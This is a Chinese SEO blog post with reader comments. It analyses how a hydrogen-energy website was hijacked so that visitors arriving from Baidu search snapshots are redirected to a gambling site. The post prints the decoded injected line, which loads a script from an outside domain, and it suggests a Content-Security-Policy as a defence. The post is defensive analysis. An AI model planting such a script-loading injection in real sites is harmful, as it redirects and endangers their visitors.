太原SEO
专注关键词排名

2019开工大吉,网站劫持实例剖析 太原SEO-网站劫持

2018结束了,所有的好的、不好的请留在2018,2019这是一次新的起航,今年恰逢我的本命年,最近也有喜事临门,原本我的朋友豪先生由于工作的原因,我们有两个多月的时间没有怎么联系,最近朋友的工作有变动,我们又能一起交流了,古人云:人逢知己千杯少,我憧憬这一天已经很长时间了,这里我祝愿关注本站的站长以及我的好朋友豪先生在新的一年里工作顺利、万事如意。

在昨天看到了大事记站长的留言,提到李毅的网站发布的文章中SEO类别之外的文章比较多,这里李毅确实需要反思一下了,本人建立本站的初衷本来就是为了分享、记录自己的在网站优化方面的心得和做站技巧。然而最近关于SEO的文章的比例确实下降很多,这里李毅做出深刻的检讨,接下的日子里,李毅将倍加努力增加关于网站优化的文章。

网站劫持实例剖析

网站劫持实例剖析

网站劫持,相信很多站长都遇到过网站劫持,其行为真的是令人痛恨啊,网站劫持的手法往往都比较隐秘,经常是从网站的快照方面进行劫持,也就是从网站快照进网站才会发现跳转,通过域名进入网站则显示是正常的,劫持的人员除了一部分做灰产的、还有一些不良的运营商,当然也不排除搜索引擎内部人员搞鬼。今天李毅就拿一个实例出来,具体讲讲网站劫持是怎么进行的。

这次给大家分享的案例可是相当了不得,这次被劫持的网站是中国氢能源网,大家百度搜索“氢能源”,会出现“中国氢能源网”,网址是www.china-hydrogen.org ,大家通过域名进入网站的话是正常显示,只有通过快照进入网站时才会触发跳转,这里需要注意的是你的IP必须是国内的IP,点击以后跳转是某菠菜网站,我专门看了一下百度搜索地址是:https://www.baidu.com/link?url=p7cFgSeqnDkVcG7w7KtQSmEPsIjaYXZW7eF8CnBAc_bqPHdGxO6UFFSErEyhHuBC&wd=,当你把 querystring 的 wd 去掉,就可以正常停留在网站内了,看起来应该是网站内被挂了 js 检查 wd 这个参数。这种情况下应该怎么检查挂马代码呢?请大家继续往下看。

中国氢能源网

中国氢能源网

查看中国氢能源网的HTML代码,第10行内容,解码后内容为:window[“document”][“write”](‘<script type=”text/javascript” src=”https://www.cpdas8.com/dd.js“></script>’);  从这里可以看出加入的JS代码应该很短,该 JS 内容的倒数第二行将网页进行了跳转。 这里李毅就不把该js代码贴出来了,大家自行点开看吧。

这里李毅推荐一种比较简单的处理方法,能够较为的简单的阻止这种代码执行,即使不幸被挂马,也不会影响用户。在服务端返回的时候(有前置反向代理,则可以在外层代理上设置),加上相对严格的 CSP 即可,比如可以运用这样的策略

“script-src ‘self’ ‘unsafe-inline’; object-src ‘self’

eval 函数会被直接禁用,而且浏览器只会加载同源的资源,其他的资源都会被阻止。

通过分析此案例,可以判断该网站应该是被黑了,不是某些不良运营商植入的代码,毕竟这种植入对运营商半点好处都没有,相反还会带来巨大风险,为了以后出现这种情况,李毅在这里建议大家给浏览器装一个Adblock,通常情况下如果发现网站被挂马,先检查网站的webconfig 文件,里面加了如果是各种搜索引擎来的直接跳转到他的域名上。如果其他站长朋友们有更好方法请在文章下方留言,我们一起交流分享。

 

赞(0) 打赏
【本站文章禁止任何媒体转载,侵权必究!】太原SEO - 专注关键词排名「免费指导」 » 2019开工大吉,网站劫持实例剖析
分享到: 更多 (0)

评论 15

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. #1

    跟着大佬学seo优化

    久伴博客2周前 (01-03)回复
  2. #2

    劫持?上SSL不就可以了…

    灰常记忆2周前 (01-04)回复
    • 加SSL证书也是可以的,但是SSL证书也不能完全杜绝劫持。

      李 毅2周前 (01-04)回复
  3. #3

    恩 ssl也不能杜绝劫持的

    • 是的,做灰产的和不良运营商那么多,杜绝是不可能的

      李 毅2周前 (01-05)回复
  4. #4

    这个可以有,运营商都是一样的黑…得断了他们的财路

    旧日的足迹2周前 (01-05)回复
  5. #5

    别瞎搞啊,老铁~

    菜鸟日记2周前 (01-05)回复
    • 这个只是发现的案例,至于是谁黑的,就不清楚了,这里只是分析劫持手法是如何做到的

      李 毅2周前 (01-05)回复
  6. #6

    2019年,已经悄悄的开启一周,博主已经扎实的开工了,点赞~学习~~

    响石潭2周前 (01-05)回复
  7. #7

    升级到HTTPS可以有效减少劫持,然后再注意网站安全应该可以顶一段时间

    懿古今2周前 (01-06)回复
  8. #8

    不错,写的很喜欢啊

太原SEO - 专注关键词排名「免费指导」

SEO新手入门太原SEO服务项目

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏